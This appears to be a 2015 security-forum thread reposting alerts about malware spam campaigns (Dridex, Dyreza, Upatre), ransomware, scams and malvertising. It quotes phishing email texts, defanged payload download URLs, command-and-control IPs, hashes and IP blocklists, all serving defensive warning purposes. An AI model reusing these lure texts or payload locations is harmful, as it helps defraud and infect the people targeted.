14.04.2015 - "Victims of the CoinVault ransomware have a chance to retrieve their data -without- having to pay the criminals, thanks to a repository of decryption keys and a -decryption- application made available online by Kaspersky Lab and the National High Tech Crime Unit (NHTCU) of the Netherlands’ police:
> https://noransom.kaspersky.com/
CoinVault ransomware has been around for a while, encrypting victims’ files and demanding Bitcoins to unlock them. In order to help victims recover from an attack, the NHTCU and the Netherlands’ National Prosecutors Office obtained a database from a CoinVault command & control sever. This server contained Initialization Vectors (IVs), Keys and private Bitcoin wallets and helped to create the special repository of decryption keys. As the investigation is ongoing, new keys will be added when available. “We have uploaded a huge number of keys onto the site. If we do not currently have records for a particular Bitcoin wallet, you can check again in the near future, because together with the National High Tech Crime Unit of the Netherlands’ police we are continuously updating the information,” - says Jornt van der Wiel, Security Researcher at Kaspersky Lab. CoinVault has infected more than 1,000 Windows-based machines in over 20 countries, with the majority of victims in the Netherlands, Germany, the USA, France and the UK. Victims have also been registered in Belgium, Austria, Switzerland, Norway, Sweden, Luxemburg, Denmark, Slovakia, Slovenia, Spain, Italy, Hungary, Ireland, Croatia, Russia, Canada, Israel, the United Arab Emirates, China, Indonesia, Thailand, South Africa, Australia, New Zealand, Panama, the Dominican Republic, and Mexico."
___
Fake 'USPS' SPAM - PDF malware
- http://myonlinesecurity.co.uk/usps-fail-to-deliver-your-package-fake-pdf-malware/
14 Apr 2015 - "'USPS – Fail to deliver your package' pretending to come from USPS <no-reply@ usps .gov> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/USPS-Fail-to-deliver-your-package.png
14 April 2015: USPS2335999.zip: Extracts to: USPS04142015.scr
Current Virus total detections: 7/55* . This 'USPS – Fail to deliver your package' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8fa64cf8f24bb2e7a33de44cac8820186231c159e3a6e49d7aa968b25cf8ca67/analysis/1429034017/
... Behavioural information
TCP connections
83.219.139.124: https://www.virustotal.com/en/ip-address/83.219.139.124/information/
90.84.60.64: https://www.virustotal.com/en/ip-address/90.84.60.64/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
:fear: :mad:
AplusWebMaster
2015-04-15, 16:07
FYI...
Fake 'Invoice' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/04/malware-spam-invoice-from-living-water.html
15 Apr 2015 - "This -fake- invoice does not come from Living Water, but instead is a simple forgery with a malicious attachment.
From: Natalie [mailto:accounts@living-water.co.uk]
Sent: Wednesday, April 15, 2015 9:43 AM
Subject: Invoice from Living Water
Dear Customer :
Your invoice is attached. Please remit payment at your earliest convenience.
Thank you for your business - we appreciate it very much.
Sincerely,
Living Water
0203 139 9051
In the sample that I received, the attachment was named Inv_300846161_from_Living_W.doc which has a VirusTotal detection rate of 1/55*. This contains a malicious macro... which downloads a file from the following location:
http ://adlitipcenaze .com/353/654.exe
There are probably other download locations, but they will all have the same payload. This is saved as %TEMP%\rizob1.0.exe and currently has a detection rate of 6/57**. Automated analysis tools... show attempted connections to the following IPs:
89.28.83.228 (StarNet, Moldova)
78.24.218.186 (TheFirst-RU, Russia)
37.140.199.100 (Reg.Ru Hosting, Russia)
According to this Malwr report it drops a Dridex DLL with a detection rate of 4/57***.
Recommended blocklist:
89.28.83.228
78.24.218.186
37.140.199.100
MD5s:
2ecf5e35d681521997e293513144fd80
9932c4a05ca0233f27b0f8404a8dc5bd
68e1e7251314944a4b4815adced70328
* https://www.virustotal.com/en/file/54592c20b4937b3136435026434be14f9c951195c19cc346155646961cf9e3b8/analysis/1429086775/
** https://www.virustotal.com/en/file/3202fe0fb2a5cfee79b87349cfa75d8992a7e9c0442dff740b3e999fe360b006/analysis/1429086792/
*** https://www.virustotal.com/en/file/480d3f4b1bbe21105806be6403b60a4fadb3a0d28b459a64bb773c7455eaaa28/analysis/1429088210/
- http://myonlinesecurity.co.uk/natalie-invoice-from-living-water-word-doc-or-excel-xls-spreadsheet-malware/
15 Apr 2015
> https://www.virustotal.com/en/file/95a43a3f9561e6c4647fdd61fb6d2411af6e4940491b6f69812a3ebb1914c67c/analysis/1429086260/
___
Fake 'info' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-info-fake-pdf-malware/
15 Apr 2015 - "'RE: info' pretending to come from user <michael@ mwrk .co .za> with a zip attachment is another one from the current bot runs...The email looks like:
Always choose a reliable partner.
We are those who can offer the best financial proposal to you.
We can find the best solution to solve your specific problem.
Details see the attachment.
15 April 2015: New doc(43).zip : Extracts to: partner.exe
Current Virus total detections: 2/57* . This 'RE: info' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/304a866cceda2371137edcc1161cb4fcc9de9b9133f8b45c82e2972b7a46d4ee/analysis/1429093267/
... Behavioural information
TCP connections
83.219.139.124: https://www.virustotal.com/en/ip-address/83.219.139.124/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
:fear: :mad:
AplusWebMaster
2015-04-16, 15:04
FYI...
Fake 'Receipt' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/carmen-rodriguez-receipt-word-doc-or-excel-xls-spreadsheet-malware/
16 Apr 2015 - "'RECEIPT' pretending to come from Carmen Rodriguez <crodriguez@ hswcorp .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Thank you for your business.
Carmen Rodriguez
Administrative Assistant
16 April 2015 : 58173841.doc | Current Virus total detections: 3/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it...."
* https://www.virustotal.com/en/file/73fcfcceba730ec97d370e27bf046ace906f8b66e5d92051eb3b094de232d9df/analysis/1429173650/
___
Fake ACH SPAM - Malware
- http://blog.dynamoo.com/2015/04/malware-spam-decisive-notification.html
16, Apr 2015 - "This -fake- ACH spam leads to malware:
From: aileen.alberts@ [redacted]
Date: 16 April 2015 at 15:55
Subject: Decisive notification about your Automated Clearing House payment
The Automated Clearing House transaction transfer, recently initiated from your company"s online bank account, has been rejected by the EPA.
Rejected ACH payment
Automated Clearing House transfer Case # L669461617
Transaction Total 27504.02 US Dollars
Email [redacted]
Reason of Termination Download full details
Please visit the link provided at the top to see more information about this problem.
The link in the email goes to a download location at dropbox .com which downloads a malicious Word document Automated_Clearing_House transaction9090.doc which contains this macro... it is rather different from other offerings. From what I can tell, it downloads an encrypted file... from:
sundsvallsrk .nu/tmp/1623782.txt -or-
hpg .se/tmp/1623782.txt
And some sort of executable from Dropbox with a detection rate of 3/57*. Automated analysis tools are inconclusive at the moment... although the Payload Security report[1] does show several dropped files including two malicious scripts... Of note is that one of the scripts downloads what looks like a PNG from:
savepic .su/5540444.png
For now, I would recommend blocking traffic to
sundsvallsrk .nu
hpg .se
savepic .su "
1] https://www.hybrid-analysis.com/sample/8ba3602154e8f98e4a5097c9ba693b1ec0288c0a103b7715a75c3c0d73e75221?environmentId=2
* https://www.virustotal.com/en/file/cc66c07dbdf570e0790d3543e374189f57b9a09951cfab2a99bb9f9c3051c0de/analysis/1429197445/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'IRS tax refund' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/payment-confirmation-for-tax-refund-request-3098-2344342-word-doc-or-excel-xls-spreadsheet-malware/
16 Apr 2015 - "'Payment confirmation for tax refund request # 3098-2344342' pretending to come from Internal Revenue Service <office@ irs .gov> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Payment-confirmation-for-tax-refund-request.png
"... Payment method : Wire transfer..."
16 April 2015 : confimation_3098-2344342.doc - Current Virus total detections: 0/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a85cec715b796106eabc1df74ca3b41321546820db2e93013aac45c909bd5189/analysis/1429207628/
- http://www.irs.gov/taxtopics/tc152.html
"There are -three- options for receiving your federal individual income tax refund:
- The fastest way is by direct deposit (electronic funds transfer) into your checking or savings account, including an individual retirement arrangement (IRA);
- By purchase of U.S. Series I Savings Bonds; or
- By paper check sent to the address listed on your return..."
... 'Wire Transfer' is -not- an option.
___
SCAM lures Facebook Users with “Hot Video”, Drops Trojan
- https://blog.malwarebytes.org/fraud-scam/2015/04/scam-lures-facebook-users-with-hot-video-drops-trojan/
Apr 16, 2015 - "... as more and more users are creating, sharing, and viewing videos on Facebook now more than ever, we can also expect online criminals to jump in on the bandwagon and attempt to get some of the attention, too... if you see an interesting post on your feed carrying a link to a supposed video that, once visited looks similar to the screenshot below, know that you’re no longer on Facebook but on an imitation page located at http ://storage [dot]googleapis[dot]com/yvideos/video2[dot]html:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/fake-fb-yt.png
The individual or group behind this scam has abused Google’s free online file storage service to house the HTML page that has mimicked Facebook’s interface. This method has been a long-time practice of phishers who use free such services like Dropbox and Google Drive in their campaigns. Once you hit the Play button, an error message appears on top, saying that Flash Player is required to view the video. A file named youtube.scr is downloaded instead:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/fake-fb-yt-dl.png
... This file lacks the sophistication to detect virtual environments, so one can easily test it against any free, online sandbox—in this case, I used this one from Payload Security — to see how badly it behaves on a system once executed. Malwarebytes Anti-Malware (MBAM) detects* youtube.scr as Trojan.Ransom.AHK."
* https://www.virustotal.com/en/file/21815229a5648aa694e76207f659b8728f529444d4589e1c211ba18fd446f4e7/analysis/1429127928/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Business Support Giveaway - 419 Scam
- https://blog.malwarebytes.org/fraud-scam/2015/04/business-support-giveaway-419-scam/
Apr 15 - "... we can’t get too excited, because it’s just a fresh run of a 419 scam which has been in circulation in similar forms for about a year or two:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/unfound1.jpg
... Not the most watertight of scams when your gameplan is effectively “We’re all about solving global problems and saving the world in times of disaster...” Of course, most recipients probably don’t own a bank or a gold-plated yacht and may well throw reason out the window in favour of hitting the -reply- button. As with all mails of this type, the only thing you’re going to get is some identity fraud, financial loss and the possibility of turning yourself into a money mule. It certainly isn’t worth responding to the senders, so feel free to -delete- it and advise any recipients you know to do the same thing. This is one piece of business support you can definitely do without."
:fear: :mad:
AplusWebMaster
2015-04-17, 14:46
FYI...
Fake 'Credit Card Statement' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/julie-mckenzie-credit-card-statement-word-doc-or-excel-xls-spreadsheet-malware/
17 Apr 2015 - "'Credit Card Statement' pretending to come from Julie Mckenzie <julie38@ swift-cut .co .uk> ( random numbers after Julie) with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Credit-Card-Statement.png
17 April 2015 : C Swift Credit Card.doc - Current Virus total detections: 0/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0deaedf5c44702c9ab785b172c5089c3dca3f9a164d6caa6dfaeb8fee7da3fef/analysis/1429265218/
- http://blog.dynamoo.com/2015/04/malware-spam-julie-mckenzie.html
17 Apr 2015
"... Attached is a file C Swift Credit Card.doc which comes in at least -four- different versions, all of which are malicious and all of which have a macro... These macros download a file from one of the following locations:
http ://oolagives .com/24/733.exe
http ://derekthedp .com/24/733.exe
http ://sempersleep .com/24/733.exe
This is saved as %TEMP%\grant8i.exe and has a VirusTotal detection rate of 11/54* (identified clearly as a Dridex component). Automated analysis... shows that it attempts to communicate with:
46.36.219.32 (FastVPS, Estonia)
I recommend that you -block- traffic to that IP address. Furthermore, the Malwr report shows it dropping a malicious DLL with a detection rate of 6/53**."
* https://www.virustotal.com/en/file/98a89dd299599b9b42d6dd43e6618f0b197596d7ea20d9d335812d178490605a/analysis/1429294915/
... Behavioural information
TCP connections
46.36.219.32: https://www.virustotal.com/en/ip-address/46.36.219.32/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
** https://www.virustotal.com/en/file/5393935da519add1c19e285291dd790d8d6cf04fcdd2d721f6d530f0f2132ee7/analysis/1429295949/
___
Fake 'Conference' SCAM
- http://blog.dynamoo.com/2015/04/scam-your-invited-for-five-days-summit.html
17 Apr 2015 - "This spam email forms part of a Conference Scam*:
* http://www.theatlantic.com/international/archive/2013/10/the-new-nigerian-scam-targets-professional-conferences-for-visas/280445/
From: United Nations Summit [no_replytoold@ live .com]
Reply-To: unitednation .unt@gmail .com
Date: 16 April 2015 at 17:59
Subject: Your Invited For A Five Days Summit 5th -9th May, 2015 in London (UK),
Dear Invitee, Nonprofit/NGO Colleague,
UN General Assembly invites companies and organizations to participate in this important meeting. UN convening a Four-day Global Summit of Economists, Educationists, Administrators, Manufacturers, International Finance, Corporate Finance, Researchers, Non-Governmental Organizations, Religious Leaders, Community Organizations,lawyer and law firm,individuals from the public and Private Sector from 5th-9th May, 2015 in London (UK) to assess the worst global economic down turn since the Great Depression. The aim is to identify emergency and long-term responses to mitigate the impact of the crisis, especially on vulnerable populations, and initiate a needed dialogue on the transformation of the international financial architecture, taking into account the needs and concerns of all countries of the world. You are invited to take part in the International Conference.
Registration to this Summit is absolutely "free" and strictly for invited individuals and organizations only. As an invitee, you have received a registration code UN/CODE/66987/2015-UK with the invitation letter, which grants you access to the registration form.
The United Nations General Assembly will sponsor free travel costs and all-round flight tickets for all participant. Invited participants will only be responsible for their hotel accommodation and feeding cost at the Royal Queens Hotel...
... Notice that "Invited participants will only be responsible for their hotel accommodation and feeding cost at the Royal Queens Hotel." There is -no- hotel in London with the name "Royal Queens Hotel", but the scammers will magic one up for you to take pre-payment for your hotel.. and will then -vanish- with your money. There are some similarly-named hotels in London, for example the Hotel Royal @ Queens, but this is not the same hotel. Be warned though that sometimes scammers do go to the effort of setting up a -fake- hotel website to make the scam more credible.
Avoid."
___
Flash EK strikes again via Google’s DoubleClick
- https://blog.malwarebytes.org/malvertising-2/2015/04/flash-ek-strikes-again-via-googles-doubleclick/
Apr 16, 2015 - "A few days ago, we blogged about a -malvertising- attack on the HuffingtonPost website* via a major ad network which took advantage of a vulnerability in Flash Player... another major attack was also being carried on around the same time, most likely by the same gang. Working with ClarityAd, we quickly confirmed the malicious activity around 04/11 which showed a well-known ad network (merchenta) with direct ties to Google’s DoubleClick being caught in a large malvertising incident. The latest malvertising attack was carried through merchenta, a company that provides a platform for ad exchange and direct integrations with top publishers. They boast a 28 -billion- monthly impressions for the US alone and work directly with top tier ad networks such as Google’s DoubleClick. The criminals posed as an advertiser, infiltrated the platform via a third party and managed to house a malicious advert directly on merchanta’s ad platform which was fed into Google’s DoubleClick channels. Within minutes, the booby trapped ad had a 95% reach in USA, Europe & UK exposing a huge number of people worldwide:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/merchenta.png
Although DoubleClick is 'not directly responsible' for loading the malicious ad, it starts the chain of trust with the publisher, which unfortunately has little control over the subsequent transactions taking place:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/newflow.png
... this malicious SWF had -zero- detection on VirusTotal** when it was first submitted... All ad networks have been informed, but the attack did last for a few days most likely infecting a significant number of people. This latest example is yet another reminder of one of the big weaknesses with online advertising. Ad networks rely on third parties and the chain of trust can easily be broken when -one- rogue actor joins in... These crooks essentially pose as working for a fortune 500 company and submit a clean advert. The ad network is very interested because that will be a big customer and so they make sure to accommodate the client as much as they can. The advert still goes through quality assurance and security tests before finally getting ready for prime time. Right before that happens, the rogue advertiser sends a -new- version of the ad (with only a minor change they claim) and the ad network, not wanting to lose a client, skips the checks that were already done. It turns out that the new version of the ad is -malicious- and yet has -full- clearance to be displayed via major networks. This is just one of the many tricks rogue advertisers will use to insert themselves in the chain..."
* https://blog.malwarebytes.org/malvertising-2/2015/04/booby-trapped-hugo-boss-advert-spreads-cryptowall-ransomware/
Apr 13, 2015
** https://www.virustotal.com/en/file/5d15baa9963a4b348a5fa1c103630a31961b4c80fc325b12ca88e2ee19e3064b/analysis/1429069586/
File name: merchenta-flash-malware.swf
Detection ratio: 0/57
:fear::fear: :mad:
AplusWebMaster
2015-04-20, 14:32
FYI...
Fake 'Pending payment' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/hector-malvido-pending-payment-word-doc-or-excel-xls-spreadsheet-malware/
20 Apr 2015 - "'Pending payment' pretending to come from Hector Malvido <handyman1181@ hotmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Pending-payment.png
20 April 2015 : filename-1.doc - Current Virus total detections: 2/57* | 3/50**
... So far I have seen 2 versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/686e9a383b55bc3b172b448fb0a4ba17cd516bf536927b448e2e930be21c7802/analysis/1429523984/
** https://www.virustotal.com/en/file/ee7eb51b3ffba80546330499dd67928b4d312c1dbb5fb29866e24a062d9378f9/analysis/1429523284/
- http://blog.dynamoo.com/2015/04/malware-spam-hector-malvido.html
20 Apr 2015
"... filename-1.doc (3/57* detection by AV vendors)...
... %TEMP%\grant8i.exe - VirusTotal detection rate of 5/57**
... Dridex DLL with a 3/57*** detection rate...
Recommended blocklist:
89.28.83.228
MD5s:
673626be5ea81360f526a378355e3431
7ca6884ad8900797c7f0efaaabe0c0da
8c0661aefa9aa25d8fddf2a95297e04e "
* https://www.virustotal.com/en/file/b27453540d85d2f2d75c3b9d4202cae18f00dfaab490873ce798ecbf56a58656/analysis/1429525562/
** https://www.virustotal.com/en/file/fc2224653e128c56d62f75b1a95dc80469217c090dff797f6a1f02b98a1df76d/analysis/1429525576/
*** https://www.virustotal.com/en/file/542264fe87240700795e48f2c5a509e015b382bb1505f83a1e049ef2eb72f7e6/analysis/1429526728/
___
Fake 'HSBC credit card' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-credit-card-balance-new-credit-terms-fake-pdf-malware/
20 Apr 2015 - "'HSBC credit card balance – new credit terms' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Dear client,
We are pleased to inform you that our bank is ready to offer you a bank
loan. We would like to ask you to open the Attachment to this letter and
read the terms.
HSBC ...
These all have random attachment names. The name of the pretend sender matches the attachment zip name. Some I have seen are:
mark.zip
info.zip
john.shank.zip
These extract to names like monkey.exe had.exe blya.exe fable.exe
20 April 2015: random zip name : Extracts to: random file name
Current Virus total detections: 3/55* | 3/55** | 3/55*** . This 'HSBC credit card balance – new credit terms' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c69fbc31eb3d17fae81798e11a8f73384fa4cfade37a45ece03623e6ec7579e6/analysis/1429531817/
** https://www.virustotal.com/en/file/7812da1dec326f26a4b6bd3c708b5eb19f89d580237f3c3a4f362779e7d3a88d/analysis/1429531906/
*** https://www.virustotal.com/en/file/7812da1dec326f26a4b6bd3c708b5eb19f89d580237f3c3a4f362779e7d3a88d/analysis/1429531906/
___
UPS Spam
- http://threattrack.tumblr.com/post/116927231653/ups-spam
Apr 20, 2015 - "Subjects Seen
Status update for tracking# 25768265
Typical e-mail details:
Dear customer,
Unfortunately we were not able to deliver the package sent to you on 29 Nov 2014 because your delivery address does not exist.
Please download and print out the following shipping invoice and collect your package at the nearest UPS office :
wwwapps .ups. com/WebTracking/track.aspx?trk=25768265&action=download_pdf_invoice
Thank you for choosing UPS
Malicious URLs
baloomedia .com/wp-content/plugins/cached_data/label_0420.zip
Malicious File Name and MD5:
label_420.pif (ed9b821c16763450cc8e807528030bc4)
Tagged: UPS, Dyreza
176.126.200.42: https://www.virustotal.com/en/ip-address/176.126.200.42/information/
___
Fiesta EK spreads Crypto-Ransomware ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/fiesta-exploit-kit-spreading-crypto-ransomware-who-is-affected/
Apr 20 2015 - "... no great surprise to see the Fiesta exploit kit being used to deliver crypto-ransomware. The choice of exploits delivered is broadly in line with other exploit kits. Flash, Internet Explorer, Adobe Reader/Acrobat, and Silverlight are all targeted:
Exploits used by Fiesta:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/fiesta-crypto9.png
... after March 19, we noticed a -change- in the malware payloads delivered to victims. Before that date, crypto-ransomware was being delivered to end users. Aside from encrypting the user’s files, this particular variant terminates some running processes (Process Explorer, Task Manager, the Command Prompt, Regedit, and Msconfig) so that it cannot be terminated by the user easily:
Screenshot of crypto-ransomware:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/fiesta-crypto2.png
After March 19, Fiesta served up a threat best known from previous years: fake antivirus. Again, it disables some common system tools such as Task Manager, Process Explorer, and Internet Explorer, so that this -fake- antivirus cannot be easily shut down. It’s not clear why the attackers chose to return to this older kind of threat:
Screenshot of fake antivirus:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/fiesta-crypto3.png
... Best practices: The first step to -defend- against these attacks is: keep software up-to-date. By removing the vulnerabilities that an exploit kit targets, users can prevent themselves from becoming the next victims of these attacks..."
:fear: :mad:
AplusWebMaster
2015-04-21, 13:53
FYI...
Fake 'E-Ticket' SPAM – javascript malware
- http://myonlinesecurity.co.uk/e-ticket-7694892-american-airlines-e-ticket-services-javascript-malware/
21 Apr 2015 - "'E-Ticket 7694892' pretending to come from E-Ticket <online@ ticket .com> with a link to a zip attachment is another one from the current bot runs... The email looks like:
This is your e-ticket receipt.
SEAT / 30A/ZONE 3
DATE / TIME 7 MAY, 2014, 09:19 AM
ARRIVING / Tulsa
ST / OK
REF / KE.7818 BAG / 4PC
TOTAL PRICE / 438.16 USD
FORM OF PAYMENT / CC
Download E-Ticket 7694892
Yours sincerely,
American Airlines E-Ticket services.
21 April 2015: E-Ticket 7694892.zip: Extracts to: E-Ticket 7694892.js
Current Virus total detections: 9/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e17e741288201524e089e201d9f1f3d5ad838228d52d795eb67f8953d3c194fb/analysis/1429584330/
___
Fake 'invoice' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2015/04/malware-spam-lag-invoice-i413136.html
21 Apr 2015 - "This spam email does not come from LA Grinding but is instead a simple forgery with a malicious attachment.
From: Lichelle Ebner [mailto:Lichelle5938@ lagrinding .co .uk]
Sent: Tuesday, April 21, 2015 9:55 AM
Subject: LAG invoice I413136
Dear Accounts Payable,
Attached is a copy of invoice I413136 .The items were shipped. Please feel free to contact me if you have any questions or cannot read the attachment.
Thank you for your business.
Sincerely,
Lichelle Ebner
L. A. Grinding Company
Ph. (818) 846-9134
FAX (818)846-1786
So far I have seen just a single sample with an attachment I413136.doc which has a VirusTotal detection rate of 2/57* and which contains this malicious macro... in turn this downloads a component from:
http ://eternitymobiles .com/25/144.exe
..although there are probably different versions of the macro with different download locations, the binary itself should be the same in all cases. This is saved as %TEMP%\pierre6.exe and it has a detection rate of 5/56**. Automated analysis tools... show that it attempts to communicate with a familiar IP:
89.28.83.228 (StarNet SLR, Moldova)
According to this Malwr report it also drops a malicious Dridex DLL with a detection rate of 3/56***.
Recommended blocklist:
89.28.83.228 ..."
* https://www.virustotal.com/en/file/d3ed3b8efec2d8c5833e69e39b7a5a77ae5f75581d7c187e09d61e5eabe101c8/analysis/1429609465/
** https://www.virustotal.com/en/file/8a066fb2a728990a3bce6de644cff556a5ec9a15c78bdcce44eedcbdc603a54b/analysis/1429609471/
*** https://www.virustotal.com/en/file/bb91d0b139944e02a64ec0b63879c4b972edaa39a0a2382d4e79e212459c9c8e/analysis/1429610872/
___
Fake 'Admin Exchange' SPAM – PDF malware
- http://myonlinesecurity.co.uk/administrator-exchange-email-id3405629-fake-pdf-malware/
21 Apr 2015 - "'Administrator – Exchange Email id3405629' pretending to come from Administrator@ no-reply <Administrator@ your domain > with a zip attachment is another one from the current bot runs... The email looks like:
no-reply,
This attachment provides you with managing facilities for your mailboxes, public folders, distribution lists, contact and mail service general settings. Please save the attached file to your hard drive before deleting this message.
To open the attachment (Exchange_id3405629.zip) please use the following password: Ujh6JZ2mHN
Thank you,
Administrator
Note: the address it pretends to come from will be your own email domain and the link in the email will appear to be your own web site or domain.
21 April 2015: Exchange_id3405629.zip: Extracts to: Exchange.exe
Current Virus total detections: 1/54* NOTE: we are also seeing the same malware payload coming in as a -fake- fax, and with the subject of Internal ONLY . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/71ff5e3c9e74f6cad1d405b2172a76527396b05fa7767cf85be58da06c68fd28/analysis/1429610427/
... Behavioural information
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
- http://threattrack.tumblr.com/post/117000757743/exchange-administrator-spam
Apr 21, 2015
Tagged: Exchange, Dyreza
___
Fake 'new my info' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-my-info-fake-pdf-malware/
21 Apr 2015 - "'new my info' pretending to come from random names and email addresses with a zip attachment that is named after the alleged sender is another one from the current bot runs... The email looks like:
Hello! I have found some interesting information that you might need!
Check out the attached file!
Bicicletes Nadal Oliver, S.L.
Passeig Ferrocarril, 61
07500 Manacor (Mallorca)
Illes Balears
Tel.971-843358 ...
21 April 2015: warehouseop02.zip: Extracts to: Alla.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/085c2a34d0d3d96e78777761065d49c5b6116e6cfc88feea76af4afe80dd10f6/analysis/1429618876/
___
Dridex re-directing to Malicious Dropbox hosted file via Google
- https://isc.sans.edu/diary.html?storyid=19609
2015-04-21 - "... this malware may use Google Analytics to count how many people opened the file, but I haven't confirmed that. Google -redirects- are however used to obscure the destination... Google will show a note that the user was redirected, but the file will download right away. It will not open, and the user will have to open it to enable the Macro to execute (DON'T)... Word document... example I received:
> https://isc.sans.edu/diaryimages/images/Screen%20Shot%202015-04-21%20at%208_26_43%20AM.png
... Virustotal only shows 4 "hits" out of 57* AV tools tested for this binary:
(More detail at the ISC URL above.)
* https://www.virustotal.com/en/file/efd9e8d6fe04bf8b7abcdd208c7f1b2b2fabf2ae09bce9775631047455cd533b/analysis/1429631351/
File name: ACH transaction0336.doc
:fear: :mad:
AplusWebMaster
2015-04-22, 14:08
FYI...
Fake 'voice message' SPAM – fake wav malware
- http://myonlinesecurity.co.uk/voipfone-new-voice-message-in-mailbox-fake-wav-malware/
22 Apr 2015 - "New voice message in mailbox' pretending to come from Voipfone Voicemail <voicemail@ voipfone .co .uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/New-voice-message-in-mailbox.png
22 April 2015: WAV0004291.wav.zip: Extracts to: WAV0004291.wav.exe
Current Virus total detections: 3/52* . This 'New voice message in mailbox' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0a760819fcd40ea9e3a42a651c201c314e7a0ecfacc611341fe3a2c9192a7683/analysis/1429691927/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/new-invoice-idsi19779d-signwave-jose-may-word-doc-or-excel-xls-spreadsheet-malware/
22 Apr 2015 - "'New Invoice ID:SI19779D' from [random company] pretending to come from [random name] using random names at random email addresses with a link to a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/signwave_email.png
Note: I received this as a bounced return to thespykiller. I can categorically state that it was never sent from thespykiller domain. The bad guys -spoof- email addresses to pretend to send from all the time. 99.9% of the time the alleged sending domain has -never- been hacked and they just pretend to send from that domain. I have since received several different versions from loads of random companies. The invoice number is also random is all cases.
22 April 2015 : SI19779D.docm - Current Virus total detections: 0/55*
So far I am only seeing 1 version of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8509550d6f695d47e6a4714a712a1879551ac6406e3c4def5bba1fe6e8ec453c/analysis/1429707780/
___
HSBC Payment Advice Spam
- http://threattrack.tumblr.com/post/117083173703/hsbc-payment-advice-spam
Apr 22, 2015 - "Subjects Seen:
Payment Advice - Advice Ref:[GB007112] / CHAPS credits
Typical e-mail details:
Sir/Madam,
Please download document from server, payment advice is issued at the request of our customer. The advice is for your reference only.
Download link:
bilbaopisos .es/HSBC_BANK-DATA/new_secure.html
Yours faithfully,
Global Payments and Cash Management
HSBC
Malicious URLs
bilbaopisos .es/HSBC_BANK-DATA/new_secure.html
Malicious File Name and MD5:
new_secure_payment.exe (c290126e419ff58678c3e490d89d7343)
Screenshot: https://41.media.tumblr.com/bcff8fce61f554069bce6443444ca025/tumblr_inline_nn7nfbR9TO1r6pupn_500.png
Tagged: HSBC, Upatre
